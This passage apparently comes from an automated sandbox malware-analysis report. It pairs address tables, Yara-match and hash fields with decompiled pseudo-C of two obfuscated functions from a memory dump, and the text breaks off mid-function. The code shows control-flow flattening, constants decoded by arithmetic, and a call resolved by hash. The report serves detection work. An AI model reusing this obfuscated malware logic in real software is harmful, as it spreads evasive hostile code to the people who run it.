                          0x001c78ac
                          0x001c78b1
                          0x001c78b9
                          0x001c78c1
                          0x001c78c9
                          0x001c78d1
                          0x001c78d9
                          0x001c78e1
                          0x001c78e9
                          0x001c78f1
                          0x001c78f9
                          0x001c7901
                          0x001c7911
                          0x001c7915
                          0x001c791d
                          0x001c7925
                          0x001c7929
                          0x001c7931
                          0x001c7939
                          0x001c7945
                          0x001c7948
                          0x001c794c
                          0x001c7959
                          0x001c795d
                          0x001c7965
                          0x001c796f
                          0x001c7979
                          0x001c7981
                          0x001c7986
                          0x001c798e
                          0x001c7996
                          0x001c799e
                          0x001c79a6
                          0x001c79ae
                          0x001c79b6
                          0x001c79c5
                          0x001c79c6
                          0x001c79ca
                          0x001c79ce
                          0x001c79d6
                          0x001c79de
                          0x001c79e6
                          0x001c79ee
                          0x001c79fb
                          0x001c79ff
                          0x001c7a0c
                          0x001c7a10
                          0x001c7a18
                          0x001c7a20
                          0x001c7a28
                          0x001c7a36
                          0x001c7a3a
                          0x001c7a42
                          0x001c7a4a
                          0x001c7a52
                          0x001c7a5a
                          0x001c7a5f
                          0x001c7a67
                          0x001c7a6f
                          0x001c7a77
                          0x001c7a7f
                          0x001c7a84
                          0x001c7a8c
                          0x001c7a94
                          0x001c7a9c
                          0x001c7aa1
                          0x001c7aa9
                          0x001c7ab1
                          0x001c7ab9
                          0x001c7ac1
                          0x001c7ac5
                          0x001c7acd
                          0x001c7acd
                          0x001c7acf
                          0x001c7ad0
                          0x001c7ad0
                          0x001c7ad5
                          0x001c7ad5
                          0x001c7adb
                          0x001c7bd4
                          0x00000000
                          0x001c7ae1
                          0x001c7ae3
                          0x001c7bb7
                          0x001c7bc2
                          0x001c7bc2
                          0x001c7bc5
                          0x00000000
                          0x00000000
                          0x001c7bbf
                          0x001c7bbf
                          0x001c7bbf
                          0x001c7bc7
                          0x001c7bca
                          0x001c7ad0
                          0x00000000
                          0x001c7ae9
                          0x001c7aef
                          0x001c7b34
                          0x001c7b3d
                          0x001c7b7f
                          0x001c7b9c
                          0x001c7b9f
                          0x001c7ba4
                          0x001c7ba7
                          0x001c7bae
                          0x00000000
                          0x001c7af1
                          0x001c7af7
                          0x001c7bf8
                          0x001c7afd
                          0x001c7aff
                          0x00000000
                          0x001c7b05
                          0x001c7b1a
                          0x001c7b21
                          0x001c7b26
                          0x001c7b2e
                          0x00000000
                          0x001c7b2e
                          0x001c7aff
                          0x001c7af7
                          0x001c7aef
                          0x001c7ae3
                          0x001c7c00
                          0x001c7c0b
                          0x001c7bd6
                          0x001c7bd6
                          0x001c7bd6
                          0x00000000
                          0x001c7be2
                          0x001c7ad0

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: &Qz$66$<A|$FSJ$H^$k\s$w0]$@$gA=$(O
                          • API String ID: 0-3837304947
                          • Opcode ID: df34c14625fccf1f2fb13e23a0c6ece9db9c82cc1143ccfdfc6b93f9e1cdedec
                          • Instruction ID: 168ecf260ae80d3a9d6bdbd01ca66a5423ecd948d01b31a774cc6ef50f433c7a
                          • Opcode Fuzzy Hash: df34c14625fccf1f2fb13e23a0c6ece9db9c82cc1143ccfdfc6b93f9e1cdedec
                          • Instruction Fuzzy Hash: 57B10D725093819BC394CF25C98A90BBBF2BBD4758F504A1DF1A5962A0D3B1CA49CF47
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001E261E, Relevance: 12.7, Strings: 10, Instructions: 201COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 96%
                          			E001E261E(void* __ecx, void* __edx) {
				signed int _v4;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				void* __edi;
				void* __esi;
				signed int _t199;
				signed int _t201;
				intOrPtr _t203;
				void* _t206;
				signed int _t208;
				signed int _t209;
				void* _t224;
				void* _t225;
				signed int* _t228;

				_t228 =  &_v96;
				_v8 = _v8 & 0x00000000;
				_v4 = _v4 & 0x00000000;
				_v16 = 0x13f6e3;
				_v12 = 0xf1f80a;
				_v44 = 0xfb1edb;
				_t224 = __edx;
				_t206 = __ecx;
				_t225 = 0x4fb10bf;
				_t208 = 0x7d;
				_v44 = _v44 / _t208;
				_v44 = _v44 ^ 0x00020bb5;
				_v68 = 0x95b457;
				_v68 = _v68 + 0xffff80a6;
				_v68 = _v68 + 0xf3cf;
				_v68 = _v68 ^ 0x0097bbfe;
				_v64 = 0xfe40e7;
				_t209 = 0x7b;
				_v64 = _v64 * 0x2e;
				_v64 = _v64 * 0x4e;
				_v64 = _v64 ^ 0xeb83aa68;
				_v96 = 0xadf696;
				_v96 = _v96 * 3;
				_v96 = _v96 >> 0xa;
				_v96 = _v96 * 0x74;
				_v96 = _v96 ^ 0x003a584e;
				_v32 = 0xe93227;
				_v32 = _v32 + 0x6b73;
				_v32 = _v32 ^ 0x00e805b4;
				_v36 = 0x3c30e7;
				_v36 = _v36 | 0xdee0074a;
				_v36 = _v36 ^ 0xdefaf98e;
				_v40 = 0x1efef8;
				_v40 = _v40 | 0xdf1c2796;
				_v40 = _v40 ^ 0xdf1ee469;
				_v92 = 0xd2dd9e;
				_v92 = _v92 >> 9;
				_t57 =  &_v92; // 0x9
				_v92 =  *_t57 * 0x76;
				_v92 = _v92 | 0xc83581eb;
				_v92 = _v92 ^ 0xc8391980;
				_v56 = 0x4a018f;
				_v56 = _v56 + 0xffffa7db;
				_v56 = _v56 | 0x832de762;
				_v56 = _v56 ^ 0x83627da2;
				_v28 = 0x6201a0;
				_v28 = _v28 / _t209;
				_v28 = _v28 ^ 0x00045532;
				_v60 = 0x64cc7b;
				_v60 = _v60 * 0x6a;
				_v60 = _v60 << 0xf;
				_v60 = _v60 ^ 0x557fa729;
				_v76 = 0x39ae4b;
				_v76 = _v76 ^ 0xc1a4e08e;
				_v76 = _v76 << 0xe;
				_v76 = _v76 + 0x737c;
				_v76 = _v76 ^ 0x53b3b245;
				_v80 = 0x43b44d;
				_v80 = _v80 + 0xffffd108;
				_v80 = _v80 ^ 0xb3a85a57;
				_v80 = _v80 * 0x16;
				_v80 = _v80 ^ 0x76466d58;
				_v52 = 0x43a350;
				_v52 = _v52 + 0xb5e1;
				_v52 = _v52 + 0x6429;
				_v52 = _v52 ^ 0x004d0aff;
				_v84 = 0x69869a;
				_t210 = 0x63;
				_v84 = _v84 * 0x13;
				_v84 = _v84 + 0xda19;
				_v84 = _v84 ^ 0x1d311734;
				_v84 = _v84 ^ 0x1aea7160;
				_v88 = 0x1d035e;
				_v88 = _v88 << 0xc;
				_v88 = _v88 * 0x51;
				_v88 = _v88 + 0xffff4d79;
				_v88 = _v88 ^ 0xe1072623;
				_v48 = 0xaf1ee2;
				_v48 = _v48 >> 4;
				_v48 = _v48 >> 0xa;
				_v48 = _v48 ^ 0x0006a00c;
				_v72 = 0x859658;
				_v72 = _v72 | 0xc5b36f1e;
				_v72 = _v72 * 0x73;
				_v72 = _v72 << 0xd;
				_v72 = _v72 ^ 0xf6e599a4;
				_v20 = 0x9d3fd6;
				_t199 = _v20;
				_t221 = _t199 % _t210;
				_v20 = _t199 / _t210;
				_v20 = _v20 ^ 0x0000c172;
				_v24 = 0x563333;
				_v24 = _v24 | 0xbe94e07b;
				_v24 = _v24 ^ 0xbedae89d;
				while(1) {
					L1:
					_t201 = 0x273cd46;
					do {
						L2:
						while(_t225 != 0x1acfa64) {
							if(_t225 == _t201) {
								_t201 = E001CAD82(_v76, _t221, _v80, _t224, _v76, _v76, _v52, _v84, _t210, _v88, E001DE3B5);
								_t228 =  &(_t228[9]);
								 *(_t224 + 0x34) = _t201;
								if(_t201 == 0) {
									_t225 = 0x1acfa64;
									goto L1;
								}
							} else {
								if(_t225 == 0x42103da) {
									_t221 = _v56;
									_t210 =  *(_t224 + 0x20);
									_t203 = E001D36D5( *(_t224 + 0x20), _v56, _v28, _v60);
									_t228 =  &(_t228[2]);
									 *((intOrPtr*)(_t224 + 0x28)) = _t203;
									_t201 = 0x273cd46;
									_t225 =  !=  ? 0x273cd46 : 0x1acfa64;
									continue;
								} else {
									if(_t225 == 0x4a0fd12) {
										_push(_v68);
										_t201 = L001C40E2(_v44, _t206, _t224, _t225, _t210);
										 *(_t224 + 0x20) = _t201;
										if(_t201 != 0) {
											E001CC9A9(_v64, _t201, _t201, _v96);
											_push( *(_t224 + 0x20));
											_push(_v92);
											_push(_v40);
											_t221 = _v36;
											_t210 = _v32;
											E001D62F5(_v32, _v36);
											_t228 =  &(_t228[5]);
											_t225 = 0x42103da;
											while(1) {
												L1:
												_t201 = 0x273cd46;
												goto L2;
											}
										}
									} else {
										if(_t225 != 0x4fb10bf) {
											goto L14;
										} else {
											_t225 = 0x4a0fd12;
											continue;
										}
									}
								}
							}
							goto L15;
						}
						_t221 = _v72;
						_t210 = _v48;
						E001C715A(_v48, _v72, _v20, _v24,  *(_t224 + 0x20));
						_t228 =  &(_t228[3]);
						_t225 = 0x69342d1;
						_t201 = 0x273cd46;
						L14:
					} while (_t225 != 0x69342d1);
					L15:
					return _t201;
				}
			}






































                          0x001e261e
                          0x001e2621
                          0x001e2626
                          0x001e262b
                          0x001e2633
                          0x001e263b
                          0x001e264b
                          0x001e264d
                          0x001e2653
                          0x001e2658
                          0x001e265d
                          0x001e2663
                          0x001e266b
                          0x001e2673
                          0x001e267b
                          0x001e2683
                          0x001e268b
                          0x001e2698
                          0x001e2699
                          0x001e26a2
                          0x001e26a6
                          0x001e26ae
                          0x001e26bb
                          0x001e26bf
                          0x001e26c9
                          0x001e26cd
                          0x001e26d5
                          0x001e26dd
                          0x001e26e5
                          0x001e26ed
                          0x001e26f5
                          0x001e26fd
                          0x001e2705
                          0x001e270d
                          0x001e2715
                          0x001e271d
                          0x001e2725
                          0x001e272a
                          0x001e272f
                          0x001e2733
                          0x001e273b
                          0x001e2743
                          0x001e274b
                          0x001e2753
                          0x001e275b
                          0x001e2763
                          0x001e2771
                          0x001e2775
                          0x001e277d
                          0x001e278a
                          0x001e278e
                          0x001e2793
                          0x001e279b
                          0x001e27a3
                          0x001e27ab
                          0x001e27b0
                          0x001e27b8
                          0x001e27c0
                          0x001e27c8
                          0x001e27d0
                          0x001e27dd
                          0x001e27e1
                          0x001e27e9
                          0x001e27f1
                          0x001e27f9
                          0x001e2803
                          0x001e2810
                          0x001e281f
                          0x001e2820
                          0x001e2824
                          0x001e282c
                          0x001e2834
                          0x001e283c
                          0x001e2844
                          0x001e284e
                          0x001e2852
                          0x001e285a
                          0x001e2862
                          0x001e286a
                          0x001e286f
                          0x001e2874
                          0x001e287c
                          0x001e2884
                          0x001e2891
                          0x001e2895
                          0x001e289a
                          0x001e28a2
                          0x001e28aa
                          0x001e28ae
                          0x001e28b0
                          0x001e28b4
                          0x001e28bc
                          0x001e28c4
                          0x001e28cc
                          0x001e28d4
                          0x001e28d4
                          0x001e28d4
                          0x001e28d9
                          0x00000000
                          0x001e28d9
                          0x001e28e3
                          0x001e29a6
                          0x001e29ab
                          0x001e29ae
                          0x001e29b3
                          0x001e29b5
                          0x00000000
                          0x001e29b5
                          0x001e28e9
                          0x001e28ef
                          0x001e2966
                          0x001e296a
                          0x001e296d
                          0x001e2972
                          0x001e2975
                          0x001e297c
                          0x001e2981
                          0x00000000
                          0x001e28f1
                          0x001e28f7
                          0x001e290c
                          0x001e2917
                          0x001e291c
                          0x001e2923
                          0x001e2934
                          0x001e2939
                          0x001e293c
                          0x001e2940
                          0x001e2944
                          0x001e2948
                          0x001e294c
                          0x001e2951
                          0x001e2954
                          0x001e28d4
                          0x001e28d4
                          0x001e28d4
                          0x00000000
                          0x001e28d4
                          0x001e28d4
                          0x001e28f9
                          0x001e28ff
                          0x00000000
                          0x001e2905
                          0x001e2905
                          0x00000000
                          0x001e2905
                          0x001e28ff
                          0x001e28f7
                          0x001e28ef
                          0x00000000
                          0x001e28e3
                          0x001e29c7
                          0x001e29cb
                          0x001e29cf
                          0x001e29d4
                          0x001e29d7
                          0x001e29dc
                          0x001e29e1
                          0x001e29e1
                          0x001e29f4
                          0x001e29f4
                          0x001e29f4

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: NX:$'2$)d$33V$NX:$NX:$XmFv$sk$|s$0<
                          • API String ID: 0-1033120914
                          • Opcode ID: b4025aa63ff10f974e11cc610eb68f040b27c85db29ccbfa308d1587b7c3f914
                          • Instruction ID: 4b5289e07307f5bc645be6e11e90aadb3acb50a12160d6b86f9d8367d2f73981
                          • Opcode Fuzzy Hash: b4025aa63ff10f974e11cc610eb68f040b27c85db29ccbfa308d1587b7c3f914
                          • Instruction Fuzzy Hash: BFA130718083819FC358CF25C58A80BFBE1BBD4758F105A1DF596AA260D3B5DA48CF83
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001D1591, Relevance: 11.9, Strings: 9, Instructions: 624COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 83%
                          			E001D1591(intOrPtr __ecx, intOrPtr* __edx) {
				char _v128;
				char _v256;
				char _v288;
				intOrPtr _v292;
				intOrPtr* _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				intOrPtr _v500;
				signed int _v504;
				signed int _v508;
				unsigned int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _t610;
				signed int _t662;
				signed int _t668;
				void* _t669;
				intOrPtr _t677;
				void* _t687;
				intOrPtr* _t689;
				signed int _t694;
				intOrPtr _t697;
				int _t700;
				intOrPtr _t704;
				intOrPtr _t711;
				signed int _t712;
				signed int _t713;
				intOrPtr _t714;
				intOrPtr* _t720;
				signed int _t741;
				void* _t780;
				void* _t787;
				void* _t794;
				void* _t795;
				void* _t796;
				signed int _t798;
				signed int _t802;
				signed int _t803;
				signed int _t804;
				signed int _t805;
				signed int _t806;
				signed int _t807;
				signed int _t808;
				signed int _t809;
				signed int _t810;
				signed int _t811;
				signed int _t812;
				intOrPtr _t813;
				void* _t814;
				void* _t817;
				void* _t821;
				signed int _t823;
				intOrPtr _t824;
				signed int* _t825;
				void* _t829;

				_t825 =  &_v560;
				_v296 = __edx;
				_v500 = __ecx;
				_v308 = 0x34a367;
				_v308 = _v308 >> 0x10;
				_t610 = 0x34;
				_v308 = _v308 ^ _t610;
				_t817 = 0xea2f645;
				_v544 = 0xb8bac1;
				_v544 = _v544 << 0xa;
				_v544 = _v544 + 0xdd4e;
				_v544 = _v544 | 0x419410b7;
				_v544 = _v544 ^ 0xe3f195cc;
				_v324 = 0x787f17;
				_v324 = _v324 + 0xffffba2f;
				_v324 = _v324 ^ 0x007da03d;
				_v380 = 0x7ae48a;
				_v380 = _v380 + 0xc297;
				_v380 = _v380 ^ 0x00775dd8;
				_v504 = 0xe211d8;
				_push("true");
				_pop(_t712);
				_v504 = _v504 * 0x73;
				_v504 = _v504 + 0x796b;
				_v504 = _v504 << 7;
				_v504 = _v504 ^ 0xc7330412;
				_v452 = 0xdce441;
				_v452 = _v452 + 0xffffe6d5;
				_v452 = _v452 / _t712;
				_v452 = _v452 ^ 0x000328d8;
				_v316 = 0x2bb0df;
				_t802 = 0x48;
				_v316 = _v316 * 0x36;
				_v316 = _v316 ^ 0x0939efeb;
				_v356 = 0xcad995;
				_v356 = _v356 * 0x55;
				_v356 = _v356 ^ 0x43500611;
				_v436 = 0xa94819;
				_v436 = _v436 / _t802;
				_v436 = _v436 << 0xa;
				_v436 = _v436 ^ 0x096cc0d5;
				_v404 = 0xcd31f2;
				_v404 = _v404 >> 9;
				_v404 = _v404 / _t712;
				_v404 = _v404 ^ 0x0006c8f5;
				_v348 = 0x543f35;
				_v348 = _v348 ^ 0x72886b43;
				_v348 = _v348 ^ 0x72d10eb7;
				_v536 = 0x1951a2;
				_t803 = 0x6f;
				_v536 = _v536 / _t803;
				_v536 = _v536 << 2;
				_v536 = _v536 ^ 0x5e9308a1;
				_v536 = _v536 ^ 0x5e95c1b7;
				_v420 = 0x5bda6e;
				_v420 = _v420 + 0xbe40;
				_v420 = _v420 * 0x29;
				_v420 = _v420 ^ 0x0ed93f0e;
				_v372 = 0xbac8fa;
				_v372 = _v372 ^ 0x6eee89e1;
				_v372 = _v372 ^ 0x6e5995b3;
				_v444 = 0x831612;
				_v444 = _v444 + 0xffff13c8;
				_v444 = _v444 + 0xffff4520;
				_v444 = _v444 ^ 0x0089c369;
				_v364 = 0x1eb95;
				_t823 = 0x78;
				_v364 = _v364 / _t823;
				_v364 = _v364 ^ 0x000f7d8c;
				_v388 = 0x78cb3e;
				_t804 = 0x68;
				_v388 = _v388 / _t804;
				_v388 = _v388 ^ 0x000e12a4;
				_v472 = 0xfe8b39;
				_v472 = _v472 ^ 0x4a79d81a;
				_v472 = _v472 | 0x4684679d;
				_v472 = _v472 ^ 0xb86bdad5;
				_v472 = _v472 ^ 0xf6e974af;
				_v508 = 0xf7b85e;
				_v508 = _v508 + 0xffff1a7c;
				_v508 = _v508 >> 8;
				_v508 = _v508 ^ 0x91f47709;
				_v508 = _v508 ^ 0x91fdf719;
				_v360 = 0xb3ef91;
				_v360 = _v360 << 1;
				_v360 = _v360 ^ 0x016ac8eb;
				_v516 = 0xc83176;
				_v516 = _v516 >> 3;
				_v516 = _v516 << 7;
				_t805 = 0x60;
				_v516 = _v516 / _t805;
				_v516 = _v516 ^ 0x00216802;
				_v524 = 0x99d0bf;
				_t713 = 0x2e;
				_v524 = _v524 / _t713;
				_v524 = _v524 | 0x32ed1f8e;
				_v524 = _v524 << 8;
				_v524 = _v524 ^ 0xef580268;
				_v520 = 0xec019;
				_v520 = _v520 << 7;
				_v520 = _v520 >> 8;
				_v520 = _v520 + 0xffff3d31;
				_v520 = _v520 ^ 0x000f9caf;
				_v428 = 0x847880;
				_v428 = _v428 ^ 0x2d8b13d9;
				_v428 = _v428 + 0x571a;
				_v428 = _v428 ^ 0x2d08cc52;
				_v412 = 0x94859;
				_v412 = _v412 << 0xa;
				_v412 = _v412 >> 0xa;
				_v412 = _v412 ^ 0x0001710a;
				_v300 = 0x507a00;
				_v300 = _v300 ^ 0x479f05f7;
				_v300 = _v300 ^ 0x47c7f35c;
				_v480 = 0x5775fb;
				_v480 = _v480 | 0x3774da5c;
				_v480 = _v480 + 0xffff1fad;
				_v480 = _v480 << 4;
				_v480 = _v480 ^ 0x777d225e;
				_v456 = 0xf57b23;
				_v456 = _v456 >> 0xf;
				_v456 = _v456 ^ 0xca18f90f;
				_v456 = _v456 ^ 0xca1daf67;
				_v460 = 0x7bc476;
				_v460 = _v460 >> 9;
				_v460 = _v460 >> 0xc;
				_v460 = _v460 ^ 0x000f4177;
				_v396 = 0x39e094;
				_v396 = _v396 >> 5;
				_v396 = _v396 << 0xd;
				_v396 = _v396 ^ 0x39e28150;
				_v488 = 0x70552;
				_v488 = _v488 << 0xa;
				_v488 = _v488 ^ 0x8d9a573e;
				_v488 = _v488 + 0xffffa6c3;
				_v488 = _v488 ^ 0x91806b88;
				_v448 = 0x8da13a;
				_v448 = _v448 << 0xa;
				_t806 = 0x16;
				_v448 = _v448 * 0x5f;
				_v448 = _v448 ^ 0x3b51015c;
				_v512 = 0xddb448;
				_v512 = _v512 << 9;
				_v512 = _v512 >> 0xe;
				_v512 = _v512 >> 8;
				_v512 = _v512 ^ 0x000fce2e;
				_v548 = 0xc52d6d;
				_v548 = _v548 ^ 0x08838af8;
				_v548 = _v548 << 5;
				_v548 = _v548 / _t823;
				_v548 = _v548 ^ 0x00188708;
				_v552 = 0x8ecc4c;
				_v552 = _v552 / _t806;
				_v552 = _v552 * 0xe;
				_v552 = _v552 << 0xc;
				_v552 = _v552 ^ 0xadfad4dc;
				_v340 = 0x57b067;
				_v340 = _v340 * 0x41;
				_v340 = _v340 ^ 0x164d2235;
				_v556 = 0x43c70a;
				_v556 = _v556 ^ 0x7f907696;
				_v556 = _v556 | 0xbacc01dc;
				_v556 = _v556 + 0xffff5123;
				_v556 = _v556 ^ 0xffd9e2b4;
				_v376 = 0x7b30da;
				_v376 = _v376 + 0x200b;
				_v376 = _v376 ^ 0x0072d724;
				_v440 = 0x67eef8;
				_v440 = _v440 >> 0xe;
				_v440 = _v440 + 0x5160;
				_v440 = _v440 ^ 0x000fcbf1;
				_v384 = 0x368c0f;
				_v384 = _v384 / _t713;
				_v384 = _v384 ^ 0x0007162a;
				_v332 = 0xf7e74f;
				_v332 = _v332 + 0xb023;
				_v332 = _v332 ^ 0x00fabd9f;
				_v304 = 0xa5764c;
				_v304 = _v304 + 0xffff6f82;
				_v304 = _v304 ^ 0x00aa90b6;
				_v464 = 0x7a1571;
				_v464 = _v464 << 8;
				_v464 = _v464 + 0xd5fa;
				_v464 = _v464 ^ 0x7a16e9d6;
				_v432 = 0x65ae54;
				_v432 = _v432 | 0xf549fffc;
				_v432 = _v432 ^ 0xf56ac653;
				_v368 = 0x9cc546;
				_v368 = _v368 << 0xe;
				_v368 = _v368 ^ 0x31533563;
				_v532 = 0xbb333f;
				_t807 = 0x34;
				_v532 = _v532 / _t807;
				_v532 = _v532 + 0xfffff079;
				_v532 = _v532 + 0x8871;
				_v532 = _v532 ^ 0x000afd0d;
				_v540 = 0xad9ffb;
				_v540 = _v540 + 0x1d27;
				_v540 = _v540 + 0xffffe294;
				_v540 = _v540 >> 2;
				_v540 = _v540 ^ 0x0027e576;
				_v496 = 0xee481f;
				_t808 = 0x33;
				_v496 = _v496 * 0x16;
				_t809 = 0x6b;
				_v496 = _v496 / _t808;
				_v496 = _v496 + 0xffff904f;
				_v496 = _v496 ^ 0x00673c1b;
				_v528 = 0x7b550f;
				_v528 = _v528 >> 5;
				_v528 = _v528 | 0x82d55b10;
				_v528 = _v528 << 1;
				_v528 = _v528 ^ 0x05a590f6;
				_v312 = 0x355af7;
				_v312 = _v312 << 0xa;
				_v312 = _v312 ^ 0xd568e6b4;
				_v416 = 0x50c1da;
				_v416 = _v416 + 0xffff3e63;
				_v416 = _v416 << 7;
				_v416 = _v416 ^ 0x2808c0da;
				_v352 = 0x788565;
				_v352 = _v352 << 0xb;
				_v352 = _v352 ^ 0xc42c8c91;
				_v424 = 0x444211;
				_v424 = _v424 ^ 0x494f7f50;
				_v424 = _v424 + 0xffff1346;
				_v424 = _v424 ^ 0x49031dbd;
				_v492 = 0xa142e8;
				_v492 = _v492 / _t809;
				_t810 = 0x14;
				_v492 = _v492 / _t810;
				_t811 = 0x21;
				_v492 = _v492 * 0x18;
				_v492 = _v492 ^ 0x00042e76;
				_v336 = 0xd9ae2c;
				_v336 = _v336 | 0x39c0196c;
				_v336 = _v336 ^ 0x39d2ae46;
				_v344 = 0x2d620e;
				_v344 = _v344 * 0x32;
				_v344 = _v344 ^ 0x08d7e910;
				_v400 = 0xcb12f4;
				_v400 = _v400 >> 0x10;
				_v400 = _v400 + 0xffff3b1e;
				_v400 = _v400 ^ 0xfffe3ac8;
				_v408 = 0x96e27b;
				_v408 = _v408 | 0xfd2a95fa;
				_v408 = _v408 << 9;
				_v408 = _v408 ^ 0x7de6200f;
				_v392 = 0xd8cfb0;
				_v392 = _v392 * 0x1b;
				_t714 = _v296;
				_v392 = _v392 / _t811;
				_v392 = _v392 ^ 0x00b38f79;
				_v328 = 0x749801;
				_v328 = _v328 | 0x8fe0b18f;
				_v328 = _v328 ^ 0x8ffad11a;
				_v476 = 0x8564d4;
				_v476 = _v476 << 0xa;
				_t483 =  &_v476; // 0xa
				_t812 = 0x7a;
				_t824 = _v296;
				_v476 =  *_t483 / _t812;
				_t490 =  &_v476; // 0xa
				_t813 = _v296;
				_v476 =  *_t490 * 0x26;
				_v476 = _v476 ^ 0x06b05b0a;
				_v484 = 0xd8d973;
				_v484 = _v484 << 6;
				_v484 = _v484 | 0xfddb9f7b;
				_v484 = _v484 ^ 0xfff3c4d3;
				_v320 = 0xfbd867;
				_v320 = _v320 >> 5;
				_v320 = _v320 ^ 0x000f339c;
				_v468 = 0xc51dfd;
				_v468 = _v468 << 8;
				_v468 = _v468 >> 7;
				_v468 = _v468 ^ 0x4728b7d1;
				_v468 = _v468 ^ 0x46a9f958;
				while(1) {
					L1:
					while(1) {
						_t829 = _t817 - 0x815e78c;
						if(_t829 <= 0) {
						}
						L3:
						if(_t829 == 0) {
							E001E2C81(_v496,  *_t720, _v528, _t714, _v312,  *((intOrPtr*)(_t720 + 4)));
							_t720 = _v500;
							_t825 =  &(_t825[4]);
							_t668 = _v560;
							_t817 = 0xca82f1;
							_t714 = _t714 +  *((intOrPtr*)(_t720 + 4));
							L14:
							_t780 = 0x99540a6;
							continue;
							do {
								while(1) {
									_t829 = _t817 - 0x815e78c;
									if(_t829 <= 0) {
									}
									goto L19;
								}
								goto L3;
								L31:
								__eflags = _t817 - 0xec6b752;
							} while (_t817 != 0xec6b752);
							L32:
							return _v560;
						}
						if(_t817 == 0x3da101) {
							E001CAE43(_t668, _v320, _v468);
							return 0;
						}
						if(_t817 == 0xca82f1) {
							_push(_v492);
							_push(_v424);
							_push(_v352);
							_t687 = E001D3CC9(_v336, __eflags,  &_v256, _v292 - _t714, _v344, E001C387F(_v416, 0x1c15fc), _v400, _v408);
							E001D629F(_v392, _t683, _v328, _v476, _v484);
							_t689 = _v296;
							 *_t689 = _t824;
							 *((intOrPtr*)(_t689 + 4)) = _t714 + _t687 - _t824;
							goto L32;
						}
						if(_t817 == 0x1162a32) {
							_t821 =  &_v256;
							_push(_t720);
							_push(0x10);
							_t794 = 8;
							_t795 = E001C2C02(_t794);
							_t694 = _v308;
							_pop(0);
							__eflags = _t694 - _t795;
							if(_t694 < _t795) {
								_t798 = _t795 - _t694;
								_t814 = _t821;
								_t741 = _t798 >> 1;
								__eflags = _t741;
								_t700 = memset(_t814, 0x2d002d, _t741 << 2);
								asm("adc ecx, ecx");
								_t821 = _t821 + _t798 * 2;
								memset(_t814 + _t741, _t700, 0);
								_t825 =  &(_t825[6]);
							}
							_push(0);
							_push(0x10);
							_t796 = 8;
							_t697 = E001C2C02(_t796);
							_push(_v472);
							_t813 = _t697;
							_push(_t821);
							_push(0xb);
							_push(_v388);
							E001C4A97(_t813, _v364);
							_t817 = 0x89cda0d;
							L11:
							_t825 =  &(_t825[6]);
							L12:
							_t668 = _v560;
							L13:
							_t720 = _v500;
							goto L14;
						}
						if(_t817 == 0x1fa8b82) {
							__eflags = 1;
							_push(_t720);
							_t704 = E001C2C02(1, 8);
							_push(_v452);
							_t813 = _t704;
							_push( &_v288);
							_push(9);
							_push(_v504);
							E001C4A97(_t813, _v380);
							_t817 = 0xbf850a1;
							goto L11;
						}
						if(_t817 != 0x3d03c9c) {
							goto L31;
						}
						_t813 = _t813 +  *((intOrPtr*)(_t720 + 4));
						_push(_t720);
						_push(_t720);
						_t711 = E001D5212(_t813);
						_t720 = _v500;
						_t824 = _t711;
						_t825 =  &(_t825[3]);
						_t780 = 0x99540a6;
						_t817 =  !=  ? 0x99540a6 : 0x3da101;
						goto L1;
						L19:
						__eflags = _t817 - 0x89cda0d;
						if(_t817 == 0x89cda0d) {
							_t813 = 0x4000;
							_push(0x4000);
							_push(0x4000);
							_t662 = E001D5212(0x4000);
							_t825 =  &(_t825[3]);
							_v560 = _t662;
							__eflags = _t662;
							if(_t662 == 0) {
								_t720 = _v500;
								_t817 = 0xec6b752;
								_t780 = 0x99540a6;
								goto L31;
							}
							_t817 = 0xb90b7dd;
							goto L13;
						}
						__eflags = _t817 - _t780;
						if(_t817 == _t780) {
							_push(_v556);
							_push(_v340);
							_v292 = _t813 + _t824;
							_push(_v552);
							_t570 =  &_v548; // 0x27e576
							_t714 = E001D360D( &_v288, __eflags,  &_v128, _v376, _v440, _v384,  &_v256, _t824, _v332, _v304, E001C387F( *_t570, 0x1c16ec), _v464) + _t824;
							E001D629F(_v432, _t663, _v368, _v532, _v540);
							_t825 =  &(_t825[0x10]);
							_t817 = 0x815e78c;
							goto L12;
						}
						__eflags = _t817 - 0xb90b7dd;
						if(__eflags == 0) {
							_push(_v412);
							_push(_v428);
							_t669 = E001DCD35(0x1c16ac, _v520, __eflags);
							_push( &_v256);
							_push(_t669);
							_push(_t813);
							_push(_v560);
							 *((intOrPtr*)(E001C7DE3(_t727, 0xa92f64b6, 0x185)))();
